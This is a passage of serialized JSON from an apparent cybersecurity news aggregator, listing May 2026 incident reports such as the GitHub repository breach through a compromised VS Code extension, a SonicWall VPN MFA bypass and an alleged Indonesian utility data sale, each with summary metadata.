CISA added these flaws to its Known Exploited Vulnerabilities list and mandated federal agencies patch by June 3, 2026.","https:\u002F\u002Fwww.securityweek.com\u002Fwp-content\u002Fuploads\u002F2026\u002F05\u002FMicrosoft-Defender.jpg","2026-05-21T09:52:05+00:00","2026-05-21T10:00:06.094636+00:00",{"id":451,"url":452,"name":453},"39b11040-a763-4049-9bc5-8bbf376ca5af","https:\u002F\u002Ffeeds.feedburner.com\u002Fsecurityweek","SecurityWeek",{"id":12,"icon":9,"name":13,"slug":14,"description":15},[456,457,458],{"id":6,"slug":8,"name":7},{"id":77,"slug":79,"name":78},{"id":30,"slug":32,"name":31},"f2127e6a-c8bd-45a1-bbd8-2cf75f95b2c3",{"id":461,"title":462,"slug":463,"url":464,"summary":465,"ai_summary":466,"parent_article_id":9,"relation_type":9,"image_url":467,"verify_count":202,"avg_score":9,"score_count":202,"published_at":468,"ingested_at":469,"source":470,"category":471,"tags":472,"ioc_count":214,"has_awareness_lesson":378,"awareness_lesson_id":477},"82ba1008-c993-4751-bc59-0fab8dbd4d3b","GitHub links repo breach to TanStack npm supply-chain attack","github-links-repo-breach-to-tanstack-npm-supply-chain-attack-8023fe","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fgithub-links-repo-breach-to-tanstack-npm-supply-chain-attack\u002F","GitHub says the hackers who breached 3,800 internal repositories gained access via a malicious version of the Nx Console VS Code extension, compromised in last week's TanStack npm supply-chain attack. [...]","GitHub disclosed a breach of 3,800 internal repositories stemming from an employee installing a malicious version of the Nx Console VS Code extension, which was compromised as part of the TanStack npm supply-chain attack attributed to TeamPCP. The poisoned extension (v18.95.0) was designed to steal credentials for npm, AWS, Kubernetes, GitHub, and GCP\u002FDocker; it was live for ~18 minutes on VS Code Marketplace and 36 minutes on OpenVSX before removal. 
TeamPCP has claimed access to ~4,000 private GitHub repos and is demanding at least $50,000 for the data.","https:\u002F\u002Fwww.bleepstatic.com\u002Fcontent\u002Fhl-images\u002F2026\u002F05\u002F21\u002FGitHub_headpic.jpg","2026-05-21T06:54:01+00:00","2026-05-21T08:00:09.798135+00:00",{"id":358,"url":359,"name":360},{"id":18,"icon":9,"name":19,"slug":20,"description":21},[473,474,475,476],{"id":66,"slug":68,"name":67},{"id":77,"slug":79,"name":78},{"id":60,"slug":62,"name":61},{"id":183,"slug":185,"name":184},"1673201a-f04e-453a-8683-1b4079122809",{"id":479,"title":480,"slug":481,"url":482,"summary":483,"ai_summary":484,"parent_article_id":9,"relation_type":9,"image_url":485,"verify_count":202,"avg_score":9,"score_count":202,"published_at":486,"ingested_at":487,"source":488,"category":489,"tags":490,"ioc_count":214,"has_awareness_lesson":378,"awareness_lesson_id":494},"ab7e053e-2f59-47a1-90df-06a9bd2e8fd6","RetoSwap has been drained of 7,000 XMR ($2.7 Million) after a flaw in the Haveno protocol. https:...","retoswap-has-been-drained-of-7-000-xmr-2-7-million-after-a-flaw-in-the-haveno-pr-5e983d","https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2057244918901342436","RetoSwap has been drained of 7,000 XMR ($2.7 Million) after a flaw in the Haveno protocol. https:\u002F\u002Ft.co\u002FXTF8A02Nos","RetoSwap, a cryptocurrency exchange or trading platform, suffered a significant loss of 7,000 Monero (XMR) valued at approximately $2.7 million following the exploitation of a flaw in the Haveno protocol. 
The incident highlights critical security issues in decentralized exchange infrastructure and protocol design.","https:\u002F\u002Fpbs.twimg.com\u002Fmedia\u002FHIzM2VOWMAAncHE.jpg","2026-05-20T23:39:45+00:00","2026-05-21T00:00:11.486133+00:00",{"id":206,"url":207,"name":208},{"id":6,"icon":9,"name":7,"slug":8,"description":9},[491,492,493],{"id":48,"slug":50,"name":49},{"id":18,"slug":20,"name":19},{"id":66,"slug":68,"name":67},"4f29d891-6a1b-4e36-92b1-0b0971d3107a",{"id":496,"title":497,"slug":498,"url":499,"summary":500,"ai_summary":501,"parent_article_id":9,"relation_type":9,"image_url":502,"verify_count":202,"avg_score":9,"score_count":202,"published_at":503,"ingested_at":504,"source":505,"category":506,"tags":507,"ioc_count":300,"has_awareness_lesson":378,"awareness_lesson_id":511},"cc033463-8c43-4b80-a8ae-b966a54a41fa","Hackers bypass SonicWall VPN MFA due to incomplete patching","hackers-bypass-sonicwall-vpn-mfa-due-to-incomplete-patching-d03048","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-bypass-sonicwall-vpn-mfa-due-to-incomplete-patching\u002F","Threat actors brute-forced VPN credentials and bypassed multi-factor authentication (MFA) on SonicWall Gen6 SSL-VPN appliances to deploy tools used in ransomware attacks. [...]","Threat actors exploited CVE-2024-12802 on SonicWall Gen6 SSL-VPN appliances to bypass multi-factor authentication and gain initial network access for ransomware deployment. ReliaQuest documented multiple intrusions between February and March 2026 where attackers successfully authenticated despite MFA being enabled, because organizations patched the firmware but failed to complete required manual LDAP remediation steps. 
The vulnerability does not affect Gen7\u002FGen8 devices, which are fully mitigated by firmware updates alone.","https:\u002F\u002Fwww.bleepstatic.com\u002Fcontent\u002Fhl-images\u002F2026\u002F05\u002F20\u002FSonicWall.jpg","2026-05-20T21:19:17+00:00","2026-05-20T22:00:15.05039+00:00",{"id":358,"url":359,"name":360},{"id":6,"icon":9,"name":7,"slug":8,"description":9},[508,509,510],{"id":36,"slug":38,"name":37},{"id":141,"slug":143,"name":142},{"id":30,"slug":32,"name":31},"0b304e0f-51be-4519-8263-feba38dd0f20",{"id":513,"title":514,"slug":515,"url":516,"summary":517,"ai_summary":518,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":519,"ingested_at":520,"source":521,"category":522,"tags":523,"ioc_count":202,"has_awareness_lesson":378,"awareness_lesson_id":526},"d9182c5d-8514-48ef-8186-b4cc21222857","🚨🇮🇩 Perumda Tirta Musi Palembang Alleged Customer Database Sale: 437K+ Utility Records Adverti...","perumda-tirta-musi-palembang-alleged-customer-database-sale-437k-utility-records-f7e546","https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2057196744161525900","🚨🇮🇩 Perumda Tirta Musi Palembang Alleged Customer Database Sale: 437K+ Utility Records Advertised\n\nhttps:\u002F\u002Ft.co\u002FIjAq8sSy2x","An Indonesian water utility company, Perumda Tirta Musi Palembang, reportedly had its customer database containing over 437,000 records exposed and advertised for sale. The breach includes personal and utility account information of customers in Palembang. This represents a significant privacy breach affecting a critical infrastructure provider in Indonesia.","2026-05-20T20:28:19+00:00","2026-05-20T21:00:12.22148+00:00",{"id":206,"url":207,"name":208},{"id":66,"icon":9,"name":67,"slug":68,"description":9},[524,525],{"id":188,"slug":190,"name":189},{"id":183,"slug":185,"name":184},"d5a5d0f3-e846-4134-93aa-e8e827208528"]